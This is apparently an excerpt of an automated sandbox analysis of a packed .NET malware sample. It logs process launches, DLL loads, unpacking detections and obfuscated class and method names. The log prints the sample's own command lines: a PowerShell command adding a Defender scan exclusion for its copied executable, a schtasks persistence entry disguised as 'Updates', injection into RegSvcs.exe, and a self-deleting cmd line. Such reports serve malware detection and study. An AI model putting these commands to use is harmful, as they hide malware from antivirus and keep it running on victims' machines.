              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\aVmZDnwW.exe C:\Users\user\AppData\Roaming\aVmZDnwW.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.510000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.510000.0.unpack
              .NET source code contains potential unpacker
              Source: 0.2.file.exe.94a0000.5.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.cs.Net Code: sIXRE8bdHi System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.4243c78.1.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.cs.Net Code: sIXRE8bdHi System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.cs.Net Code: sIXRE8bdHi System.Reflection.Assembly.Load(byte[])
              Source: 8.2.aVmZDnwW.exe.2a33ca0.1.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029A8338 push eax; iretd 0_2_029A8339
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A4FFB push D0456990h; iretd 0_2_0A0A5000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A208F push 8400005Eh; iretd 0_2_0A0A2099
              Source: file.exeStatic PE information: section name: .text entropy: 7.699766185970356
              Source: aVmZDnwW.exe.0.drStatic PE information: section name: .text entropy: 7.699766185970356
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.csHigh entropy of concatenated method names: 'FgHjqIT7DP', 'NAdjlbThCd', 'poij3weWBT', 'CA7jFlJe61', 'KbljYSJjil', 'FGGjoiZAYl', 'C2dj6wASdi', 'GvPjwY8xej', 'SQ2jrjWJFI', 'hASjnGUOq7'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, m2S1o1vvEKblSvSGBe.csHigh entropy of concatenated method names: 'UFoFIIEfPx', 'sGtFHaaRSV', 'Kf7F9IHW1C', 'f4HFvvIPFL', 'JSFFC1S71s', 'B8kFZaMGDh', 'beSFgAj268', 'dZvFdY0br2', 't6AFhHgfwu', 'kFyFSZeFJr'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, hCi7ubO39LUTUumiC2.csHigh entropy of concatenated method names: 'aGsoqQeYti', 'D40o3AYSLc', 'XTSoYVssZ7', 'vdQo6vjlZW', 'P2XowNbF2m', 'hw1Y0jNAsg', 'uTqYuw95hS', 'iOaYbUCd5T', 'FD0Y8GZyfc', 'z3kYeriexH'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, F7WtHKJtQWTcou7oqS.csHigh entropy of concatenated method names: 'zlkYKRGMFW', 'vCTYxclDRU', 'zliFGYb0Ca', 'EX5FfKKxBf', 'WYgFBeJGRk', 'i8hFmCRSMA', 'Is7FQ5SmEp', 'GOtFMtvfcM', 'aMBF5ffXFu', 'fEEFTkV3I1'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, K8KxjfXRQcRipaOAt1H.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IbU2h4AAj8', 'JUG2S4pEEl', 'Ssj2tN2LPF', 'jHR22dWReo', 'kdT2yecrfG', 'NBt21hRB90', 'nv32pZ8UyK'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, lMtam3cA0yx1dQi5MF.csHigh entropy of concatenated method names: 'eSQN9VWtZ9', 'Wt8Nvo3riO', 'QyeNORQHUT', 'XyyNAx5Z0r', 'cswNfet3MF', 'Eg4NBQZYbV', 'pQ2NQdHKvm', 'rQGNMmUAgA', 'PaCNT67THm', 'buwNseurBL'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, Cp8HAELrj1ru5cEc6O.csHigh entropy of concatenated method names: 'qSCERfokx', 'M9pI8ug8n', 'a7tHe7eB5', 'HmuxiCk35', 'h2WvlFy3i', 't7cJ0KD2U', 'ykvAxEfyIhf6nM1lO3', 'JumTCBQANw3kyKk8eZ', 'h9ldwIquQ', 'cEbSR3oAa'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, JQTcVuRCfs6Kyxwn2i.csHigh entropy of concatenated method names: 'BXxX6346ht', 'i1xXwxbI8G', 'wvEXnKblSv', 'sGBXaeO7Wt', 'V7oXCqSFCi', 'YubXZ39LUT', 'hjoPJNUI8LgHRUX1Sf', 'PKHpVwl7nZslLrZk2Z', 'BxcXXNK2B6', 'eSkXja6w70'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QMCIaMbg5s4A5F1Ftw.csHigh entropy of concatenated method names: 'JsMhCZ3ASZ', 'nY3hg7ifVC', 'AJNhhNpMgh', 'espht4jQVf', 'XUJhyLwe6O', 'i3LhpeS0DN', 'Dispose', 'tODdlodraT', 'yZ9d35MWln', 'CHZdFAZsN7'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, unhoQLuGpTXrEEiGIk.csHigh entropy of concatenated method names: 'cXCg8msucl', 'fTHg76MESs', 'OTod4giy9o', 'RYidX639aa', 'yBbgs2WkNi', 'd7WgDMDSgp', 'TGQgc9XmKF', 'zLegPjiUoH', 'ikRgiT9ftb', 'n8egWnj65t'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, HNmOmBX4eBFQGadRm6t.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roZSsLWKKp', 'gCkSDUi03v', 'uD5ScHsJeH', 'mSiSPpP7iB', 'XnLSi2TXUF', 'XFaSWAplPv', 'MUQSkQAXoI'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, C346ht9Y1xxbI8GhL8.csHigh entropy of concatenated method names: 'bCK3Pbjhoe', 'rZr3iBwu8M', 'aXC3WcHmrl', 'l1v3k8MBo3', 'QiP30FCTAA', 'DAM3uNi0Am', 'wiJ3bm2jeq', 'dol38ifPOB', 'xPn3eyDSjm', 'DpE374u0ca'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, Kp03lmQWNmpMfpEna0.csHigh entropy of concatenated method names: 'WFA6lo3bkq', 'JvO6FELjmU', 'vja6oEt7qD', 'hlZo7EGTdD', 'ViXozDDEtf', 'XlU64mlVl9', 'klW6XQemcW', 'NWt6LApok1', 'lNm6j5YOxs', 'Vcn6RQgJKb'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, HuOdfZXXU5PqKvLGHXp.csHigh entropy of concatenated method names: 'bVHS7sh7Lv', 'GD6SzMu4U3', 'hivt409Ux1', 'or9tXhLiY7', 'N5ftL3gCbL', 'wnftjRqJDM', 'sFgtRxN5Wa', 'BWLtqKpAFE', 'TkEtleIFfp', 'wHjt3xoSWt'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, L8KxqU5Z5chxFVN1Ct.csHigh entropy of concatenated method names: 'nm06VZFlIh', 'aiJ6UIZRED', 'YyS6EdPQoe', 'eks6ITBoJV', 'Tk66KyWuu5', 'Vcc6HqYGk8', 'jSC6xGREjL', 'pRJ69rymKM', 'Pt06v2IuXL', 'iwX6Jts740'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, Urbt7oFB2bKwG3VRLj.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wstLe855n3', 'BZKL7vbiSQ', 'Xw5LzqdBtP', 'zGoj4lvhHZ', 'h5djXXkGqS', 'KKxjLg8HsZ', 'uAIjjOUdWR', 'CPZYrmCimk66nMov6IB'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QZVcKReRAumOGuY0EA.csHigh entropy of concatenated method names: 'EOchOjH0KR', 'wqHhAbCDgl', 'jYEhGO8eyA', 'Hdqhfn7ckw', 'P4dhBqtvrk', 'QethmQ9lbW', 'mCAhQoTlN6', 'dYNhMmV4Cl', 'CcJh5Y6xaC', 'IIThTUJecZ'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, x7bpfQ7AV1lU9lutB4.csHigh entropy of concatenated method names: 'DOcSFQPQ8u', 'X43SYq0OJj', 'ihrSoj8id0', 'fq8S681Psy', 'MvdShNFQ2i', 'xfWSweC6Py', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, UWDZo0zBYX4HeHS04i.csHigh entropy of concatenated method names: 'YCOSHOAOOh', 'jFAS96f3Tm', 'iBLSvX2CRq', 'pY7SOxsnYk', 'KdhSAfPAXO', 'eOWSfMEXid', 'f7NSBAwYKY', 'qtfSp6WGND', 'FlRSVI9HBl', 'JrGSUwSwVg'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, NQDUis3aDFjfNFfLCL.csHigh entropy of concatenated method names: 'Dispose', 'O4AXe5F1Ft', 'TtQLAWx8Cw', 'gGHrJHMGoe', 'kVyX7L0Kql', 'sF6XzhS3Au', 'ProcessDialogKey', 'g7PL4ZVcKR', 'dAuLXmOGuY', 'UEALLp7bpf'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, grbhcskJK8fq6kUfDJ.csHigh entropy of concatenated method names: 'fPxgnJS4hu', 'UHagasiPUR', 'ToString', 'lPeglU7aff', 'poFg3e5Vd5', 'OdIgFjUxJ9', 'T2DgYewGuF', 'yphgoFgUS2', 'keUg6L52C4', 'bNJgwELrlP'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, LL0pDnWLwxJhYsmNZi.csHigh entropy of concatenated method names: 'ToString', 'EFxZsprHOs', 'WldZAKTEVo', 'qDiZGtoumO', 'XY4ZfO1Rc3', 'JCJZBTFEWq', 'pVFZmjyVxs', 'I82ZQvLIfk', 'qciZMcdbUE', 'fKPZ5TOetE'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, PdOKg2Pfglta4gw7b6.csHigh entropy of concatenated method names: 'vJpCT8iCCu', 'k18CDOa7tb', 'qB1CPTPiOL', 'T9LCiAPxfo', 'rXaCA7nDSp', 'zkqCGMvyJT', 'AYiCfHWQC9', 'y5YCBi2TmD', 'PugCm7BARt', 'jyrCQbxmno'
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.csHigh entropy of concatenated method names: 'FgHjqIT7DP', 'NAdjlbThCd', 'poij3weWBT', 'CA7jFlJe61', 'KbljYSJjil', 'FGGjoiZAYl', 'C2dj6wASdi', 'GvPjwY8xej', 'SQ2jrjWJFI', 'hASjnGUOq7'
